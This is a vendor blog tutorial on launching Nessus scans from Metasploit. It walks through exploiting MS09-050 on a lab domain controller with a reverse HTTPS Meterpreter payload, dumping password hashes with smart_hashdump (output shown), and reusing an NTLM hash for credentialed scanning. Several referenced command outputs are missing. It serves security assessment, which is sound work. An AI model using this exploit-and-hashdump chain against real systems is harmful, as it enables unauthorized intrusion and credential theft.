Using Nessus and Metasploit Together

Security Tools Working Together

This is the third in a series of posts that describe the use of Nessus on BackTrack 5. Previous posts covered how to activate Nessus on BackTrack 5 and how to integrate Nmap, Hydra, and Nikto with Nessus. In this post we will cover initiating Nessus scans from within Metasploit. Beginning with Nessus 4, Tenable introduced the Nessus API, which lets users programmatically interface with a Nessus server using XMLRPC. Zate Berg took the initiative to write modules in Metasploit that, among other things, can launch a Nessus scan and import the results into the Metasploit database. From there, we can find which hosts are vulnerable to exploitation, exploit them, harvest the password hashes, and then use those password hashes to initiate credentialed Nessus scans.

Configuring Nessus

The first step needed to use Nessus with Metasploit is to log into Nessus and create a user for Metasploit. In this example, I created a user called "msf" with a password of "metasploit".

While logged in as "msf", I created a policy called "Windows Server Scan". The policy has all plugins enabled and most of the defaults were left as-is since I wanted to initiate a network-based vulnerability scan.

Setting up the Metasploit Database

The first thing to do in Metasploit is configure the database. There are some steps that you need to take prior to doing this, and I found the following two articles to be helpful:

The built-in policies show up as negative numbers, and polices created by the user are numbered accordingly, starting with 1. "Windows Server Scan" is the policy we created and will use for this example. With this policy we can initiate a new scan using the "nessus_scan_new" command:

In the results for this particular host, Nessus reported that it was missing the patch for Microsoft security bulletin MS09-050. To see if Metaspoit contains an exploit for that vulnerability, run the command "search exploits 09-050":

Success! The commands shown above set the target to be attacked (RHOST) and the host to call back to once the target system has been exploited (LHOST). We've chosen a reverse-connecting HTTPS Meterpreter payload, which will connect back to our Metasploit instance on port 8443. The next task is to dump the password hashes from the remote host. I chose to use a new module called "smart_hashdump". I chose this module because the remote host is an Active Directory domain controller and has a few thousand user accounts. smart_hashdump allows us to dump the password hashes and save them to a file:

meterpreter > run post/smart_hasdump SESSION=1,GETSYSTEM=true
[*] Running module against WIN-8BPIQBRO0CX
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /root/.msf3/loot/20110601044405_default_192.168.1.180_windows.hashes_561621.txt
[+] This host is a Domain Controller!
[*] Dumping password hashes...

Take a look at the first line in the file "/root/.msf3/loot/20110601044405_default_192.168.1.180_windows.hashes_561621.txt" and you will see something like the following:

This is the local Administrator account's password. Copy the second field (highlighted in bold) which is the NTLM-hashed password for the local Administrator user. Next, configure a new Nessus policy, and use the NTLM hash as the "SMB password":

Make sure to set the "SMB password type" field to "NTLM Hash" and the "SMB account" field to "Administrator".

For comparison, the number of vulnerabilities found by scanning the target with credentials and without are shown below:

With credentials:

Without credentials:

Conclusion

It’s very pleasing to see the Nessus API being leveraged to help users be more productive. The Nessus bridge for Metasploit is a great user community project that has allowed Nessus to integrate with other popular security tools. You could even automate the above process using a script that would launch Nessus, run a scan, and exploit the remotely exploitable vulnerabilities. However, we do see that a credentialed scan produces a much more comprehensive report of the vulnerabilities present on a system. It ultimately becomes a choice of what you are trying to accomplish during your security assessments and most people will approach the process in their own way.

Contact

Try Tenable.io free for 60 days. Protect your organization from WannaCry, NotPetya and other ransomware cyberattacks. Get Started

The cookie settings on this website are set to 'allow all cookies' to give you the very best website experience. If you continue without changing these settings, you consent to this - but if you want, you can opt out of all cookies by clicking below.